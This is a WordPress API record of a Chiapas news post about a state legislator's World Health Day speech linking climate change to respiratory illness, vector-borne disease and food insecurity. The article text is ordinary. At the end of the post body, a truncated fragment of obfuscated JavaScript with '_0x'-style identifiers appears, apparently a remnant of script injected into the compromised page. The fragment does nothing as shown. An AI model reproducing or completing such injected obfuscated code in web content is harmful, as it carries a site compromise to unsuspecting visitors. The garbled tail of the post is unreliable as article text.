{"id":1173,"date":"2022-04-08T02:27:17","date_gmt":"2022-04-08T02:27:17","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=1173"},"modified":"2022-04-08T02:27:18","modified_gmt":"2022-04-08T02:27:18","slug":"cambio-climatico-amenaza-constante-para-nuestra-salud-alcazar-cordero","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=1173","title":{"rendered":"Cambio Clim\u00e1tico, amenaza constante para nuestra salud: Alc\u00e1zar Cordero"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"684\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-07-at-17.49.13-1024x684.jpeg\" alt=\"\" class=\"wp-image-1174\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-07-at-17.49.13-1024x684.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-07-at-17.49.13-300x200.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-07-at-17.49.13-768x513.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-07-at-17.49.13-1536x1026.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-07-at-17.49.13.jpeg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00b7&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<em>Es necesario impulsar acciones colectivas para proteger la salud y bienestar de todas y todos, sostuvo la legisladora.<\/em><\/p>\n\n\n\n<p>Tuxtla Guti\u00e9rrez, Chiapas a 07 de abril de 2022.- En el marco de la Conmemoraci\u00f3n del D\u00eda Mundial de la Salud, es necesario enfocar la atenci\u00f3n en los problemas sanitarios que actualmente tenemos. Este d\u00eda, brinda la oportunidad de emprender acciones colectivas para proteger la salud y bienestar de todas y todos, se\u00f1al\u00f3 la presidenta de la Comisi\u00f3n de Salubridad y Asistencia, Ver\u00f3nica Alc\u00e1zar Cordero.<\/p>\n\n\n\n<p>En su participaci\u00f3n en la m\u00e1xima tribuna del estado, la legisladora sostuvo que la conmemoraci\u00f3n de este d\u00eda es para reflexionar, pero tambi\u00e9n para exponer y amplificar los temas de prioritario inter\u00e9s para la salud mundial.<\/p>\n\n\n\n<p>Cada a\u00f1o, la Organizaci\u00f3n Mundial de la Salud selecciona un tema que se considere de inter\u00e9s prioritario para la salud p\u00fablica en el mundo.<\/p>\n\n\n\n<p>Este a\u00f1o, dijo la legisladora, la Organizaci\u00f3n Mundial de la Salud, (OMS) ha decidido elegir el lema \u201cNuestro planeta, nuestra salud\u201d. Es de destacar -dijo- que el Cambio Clim\u00e1tico es una amenaza constante para nuestra salud, esta se ve reflejada en enfermedades de las v\u00edas respiratorias, aquellas transmitidas por vectores, inseguridad alimentaria, aguas y r\u00edos contaminados, desplazamientos forzados, entre otros, todos relacionados estrechamente con los efectos del cambio clim\u00e1tico.<\/p>\n\n\n\n<p>Ante esta situaci\u00f3n, -recalc\u00f3 la diputada ante sus hom\u00f3logos de la Sexag\u00e9sima Octava Legislatura- es nuestra responsabilidad como congreso sumarnos a participar activamente, a acompa\u00f1ar los esfuerzos que realizan las organizaciones internacionales y el gobierno en sus diferentes niveles, y conjuntar ideas y propuestas que deriven en acciones favorables para nuestro Pa\u00eds y nuestro Estado.<\/p>\n\n\n\n<p>\u201cTenemos que trabajar en constante coordinaci\u00f3n, entender e identificar el papel que cada uno de nosotros juega en esta lucha por mejorar la salud de nuestro planeta\u201d.<\/p>\n\n\n\n<p>Finalmente, recalc\u00f3 Ver\u00f3nica Alc\u00e1zar Cordero, nuestro Estado tiene la gran ventaja de contar con un gobierno cuya prioridad es la Salud de todas y todos los Chiapanecos, y lo ha dejado muy en claro con todo el trabajo desplegado en las diferentes latitudes de nuestro territorio.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00b7&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Es necesario impulsar acciones colectivas para proteger la salud y bienestar de todas y todos, sostuvo la legisladora. Tuxtla Guti\u00e9rrez, Chiapas a 07 de abril de 2022.- En el marco de la Conmemoraci\u00f3n del D\u00eda Mundial de la Salud, es necesario enfocar la atenci\u00f3n en los problemas sanitarios que actualmente tenemos. Este d\u00eda, brinda la &hellip;<\/p>\n","protected":false},"author":2,"featured_media":1174,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-1173","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1173","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1173"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1173\/revisions"}],"predecessor-version":[{"id":1175,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1173\/revisions\/1175"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/1174"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1173"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1173"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1173"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}